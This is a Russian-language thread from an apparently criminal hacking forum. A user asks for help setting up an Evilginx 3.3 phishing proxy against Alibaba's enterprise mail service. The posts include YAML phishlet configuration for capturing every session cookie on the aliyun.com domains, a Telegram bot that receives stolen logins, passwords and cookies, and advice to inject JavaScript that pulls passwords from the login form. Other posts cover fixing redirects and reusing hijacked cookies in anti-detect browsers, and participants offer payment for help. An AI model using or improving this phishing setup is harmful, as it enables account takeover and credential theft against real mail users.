Пропиши все хосты от этого сайта + sessions true для захвата сеанса от них + mimes к этим хостам в субфильтрах. Для получения пароля в не зашифрованном виде напиши js inject что бы вытягивал с поля формы и передавал его.
-
XSS.stack #1 – первый литературный журнал от юзеров форума
Ищу того кто шарит в Evilginx 3.3
- Автор темы NeoOriginal
- Дата начала
- Автор темы
- Добавить закладку
- #22
Можем как то в пм списаться ? А то тут не так удобно думаю
- Автор темы
- Добавить закладку
- #23
По поводу расшифровки пароля (получения с формы) это вроде как понял да, но это щас не основная проблема, там по сути и пароль не так нужен если куки есть
- Автор темы
- Добавить закладку
- #24
Куки (заголовки пока ток как мне сказали куков) начали сохраняться, но ошибки запросов есть:
Скриншоты прикладываю, сейчас по кукам вот такой код написан:
Еще вот редирект пытался сделать, после входа чтоб, но нифига, все равно остаешься внутри аккаунта, но на своем домене. И в ТГ бот отстук спамит мне тупа логин пароль пока я на странице, как понял срабатывает триггер на юрл и он видит что я на этом юрл где надо слать данные сессии, вот и шлет. Пока вот такие вот проблемесы)) Но самая главная с куками пока что, проблема на скришноте
Скриншоты прикладываю, сейчас по кукам вот такой код написан:
YAML:
auth_tokens:
- domain: 'qiye.aliyun.com'
keys: ['.*,regexp']
type: 'cookie'
- domain: '*.aliyun.com'
keys: ['.*,regexp']
type: 'cookie'
- domain: 'aliyun.com'
keys: ['.*,regexp']
type: 'cookie'
auth_urls:
- path: '/alimail' # Альтернативная аутентификационная конечная точка
method: 'GET' # Метод GET для аутентификации
- path: '/alimail/ajax' # Путь для ajax-запросов
method: 'POST' # Метод POST для ajax-запросовЕще вот редирект пытался сделать, после входа чтоб, но нифига, все равно остаешься внутри аккаунта, но на своем домене. И в ТГ бот отстук спамит мне тупа логин пароль пока я на странице, как понял срабатывает триггер на юрл и он видит что я на этом юрл где надо слать данные сессии, вот и шлет. Пока вот такие вот проблемесы)) Но самая главная с куками пока что, проблема на скришноте
YAML:
login:
domain: 'qiye.aliyun.com'
path: '/'
redirect_url: 'https://qiye.aliyun.com/alimail'
auth_urls:
- '/alimail'
redir: 'https://qiye.aliyun.com/alimail'
Попробуй на другой домен редирект, не на aliyun и уже с него дальше
Либо при попомщи JS редирект сделай
Последнее редактирование:
- Автор темы
- Добавить закладку
- #26
Можем списаться как то в тг там или где то ? Я тут за весь день много сделал уже)) Сохраняет куки уже например. Редирект остался и грабинг пароля с формы вместо того чтоб с гет запроса брать
- Автор темы
- Добавить закладку
- #27
Такс) делюсь успехами и не очень))
Куки сохраняются, почта тоже, пароль в кривом формате тоже))
Осталось несколько проблем:
1. Все равно нет редиректа на офф страницу после входа
2. Сначала приходят - почта пароль и пустой тхт в телеграмм, а потом только куки в сессию попадают, как то не в том порядке оно работает получается.
3. Пароль надо чтоб собирало с формы (самое последнее что нужно )
Кто реди помочь плз ? Ну только не пишите те кто хочет по 1-2к за это… нет столько у меня, после успешных фиксом могу 200-300 дать да
Куки сохраняются, почта тоже, пароль в кривом формате тоже))
Осталось несколько проблем:
1. Все равно нет редиректа на офф страницу после входа
2. Сначала приходят - почта пароль и пустой тхт в телеграмм, а потом только куки в сессию попадают, как то не в том порядке оно работает получается.
3. Пароль надо чтоб собирало с формы (самое последнее что нужно )
Кто реди помочь плз ? Ну только не пишите те кто хочет по 1-2к за это… нет столько у меня, после успешных фиксом могу 200-300 дать да
all fixed
- Автор темы
- Добавить закладку
- #29
Куки умирают как то гайз, только если импортировать их в такой же браузер (именно копию) то работают, если в антик с подменой юзерагента то нифига … мб кто знает че еще подменять и тд
i will try to help and if my fix is successful we can discuss later .. pm me
Черкани в тг @H4CK3R_DEV